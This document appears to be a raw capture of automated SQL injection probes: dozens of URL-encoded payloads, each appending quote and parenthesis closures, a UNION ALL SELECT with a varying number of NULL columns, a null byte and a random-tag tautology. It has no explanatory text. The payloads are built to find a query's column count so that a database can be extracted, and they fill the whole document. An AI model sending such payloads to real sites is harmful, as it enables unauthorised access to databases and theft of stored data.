1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22AWKT%22%3D%22AWKT 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ACdA%22%3D%22ACdA 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22wRrp%22%3D%22wRrp 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22HsMo%22%3D%22HsMo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Teci%22%3D%22Teci 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22MCSM%22%3D%22MCSM 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22sshU%22%3D%22sshU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22cfCu%22%3D%22cfCu 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22haIR%22%3D%22haIR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22kiGg%22%3D%22kiGg 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22NWyq%22%3D%22NWyq 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22KvhS%22%3D%22KvhS 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22zwDU%22%3D%22zwDU 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22IJAY%22%3D%22IJAY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22fgqt%22%3D%22fgqt 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22FEyt%22%3D%22FEyt 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ECpj%22%3D%22ECpj 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22VFGd%22%3D%22VFGd 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ueqs%22%3D%22ueqs 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22VUgP%22%3D%22VUgP 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22PdhT%22%3D%22PdhT 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22krHD%22%20LIKE%20%22krHD 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22WJsZ%22%20LIKE%20%22WJsZ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22HJzb%22%20LIKE%20%22HJzb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22YPoy%22%20LIKE%20%22YPoy 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22hAFc%22%20LIKE%20%22hAFc 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22Qaaz%22%20LIKE%20%22Qaaz 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22vIix%22%20LIKE%20%22vIix 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22tKJE%22%20LIKE%20%22tKJE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22gJaH%22%20LIKE%20%22gJaH 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22kTEu%22%20LIKE%20%22kTEu 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22MPCA%22%20LIKE%20%22MPCA 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22OsVF%22%20LIKE%20%22OsVF 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22lWkX%22%20LIKE%20%22lWkX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22GZuC%22%20LIKE%20%22GZuC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22QFrL%22%20LIKE%20%22QFrL 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22UFXM%22%20LIKE%20%22UFXM 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22dkwU%22%20LIKE%20%22dkwU 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22cRru%22%20LIKE%20%22cRru 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22sEgp%22%20LIKE%20%22sEgp 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22kTEt%22%20LIKE%20%22kTEt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22WTxs%22%20LIKE%20%22WTxs 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22zPUL%22%20LIKE%20%22zPUL 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22rhoH%22%20LIKE%20%22rhoH 